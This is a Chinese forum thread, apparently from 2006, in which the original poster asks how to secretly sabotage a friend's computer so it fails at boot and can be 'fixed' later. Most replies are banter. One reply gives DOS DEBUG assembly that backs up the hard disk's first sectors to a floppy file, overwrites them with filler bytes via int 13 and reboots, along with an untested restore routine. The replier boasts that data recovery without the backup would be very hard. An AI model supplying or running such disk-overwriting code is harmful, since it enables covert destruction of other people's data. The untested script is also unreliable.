免费注册 查看新帖 |

Chinaunix

平台 论坛 博客 文库
最近访问板块 发新帖
楼主: yang19830424

请教一个卑鄙问题~ [复制链接]

论坛徽章:
41 [报告]
汇编语言可真厉害啊,估计现在精通这个的人不多了.

论坛徽章:
42 [报告]
学习一下!pf一下!

论坛徽章:
43 [报告]
藏龙卧虎啊……路过

论坛徽章:
44 [报告]
哈哈哈,太搞笑了,......郁闷啊!

论坛徽章:
45 [报告]
原帖由 plumlee 于 2006-1-4 14:01 发表
其实,主要是看对方是什么档次的人,或者说是个什么样的人。

如果那人对磁盘很熟悉,你改了引导分区他是可以看出来的。
还会告诉你是 55 AA有错。

如果那人是个很喜欢自己鼓捣问题的人,
LZ不论怎么设,都 ...

原来学好技术可以这样整人,长见识了!谢谢大家伙了!

论坛徽章:
46 [报告]
楼上的兄弟,紧后那两个字节是55AA吧,你那样会害了那个兄弟的呀!

论坛徽章:
2015年迎新春徽章
日期:2015-03-03 17:23:07综合交流区版块每日发帖之星
日期:2015-08-19 06:20:00综合交流区版块每日发帖之星
日期:2015-09-15 06:20:00
47 [报告]
原帖由 ripenabc 于 2006-1-4 22:28 发表
楼上的兄弟,紧后那两个字节是55AA吧,你那样会害了那个兄弟的呀!

这么细心,你不赚大钱才怪呢!!

大家都希望那个是PLMM吧~?

论坛徽章:
48 [报告]
真有意思,汇编很厉害,估计他的室友不怎么懂电脑,要不他也不会想出这个注意。如果室友是一个电脑高手,他也不会怕弄坏自己的电脑,还有可能主动拿出来分享。

论坛徽章:
49 [报告]
呵呵,再来一个

1. 备份
  2. debug
  3. -a
  4. mov ax,240
  5. mov bx,200
  6. mov cx,1
  7. mov dx,80
  8. int 13
  9. int 3

10. -g=100
  11. -rbx
  12. :0

13. -rcx
  14. :8000

15. -na:boot.dat
  16. -w200
  17. -f200 ffff f6
  18. -a100
  19. mov ax,340
  20. mov bx,200
  21. mov cx,1
  22. mov dx,80
  23. int 13
  24. jmp ffff:0

25. -g=100
复制代码

1. 恢复
  2. debug
  3. -na:boot.dat
  4. -l200
  5. -a100
  6. mov ax,340
  7. mov bx,200
  8. mov cx,1
  9. mov dx,80
  10. int 13
  11. jmp ffff:0

12. -g=100
复制代码

用这个方法,如果你不提供那张软盘上的 boot.dat 文件,就算你把硬盘拿到数据恢复公司,他们也很难还原 ^_^
PS: 这个程序比我之前写的那个要狠的多,我只是写出来,没有测试,大家使用要小心

论坛徽章:
50 [报告]
原帖由 yang19830424 于 2006-1-1 22:56 发表
我最近不想用电脑,我也不想让我的朋友用电脑,但是我很虚伪,又不想让他看出来是我做的手脚,让一开机就出问题,不能正常使用,而且过段时间我可以把它修好~怎么办?

是挺无耻的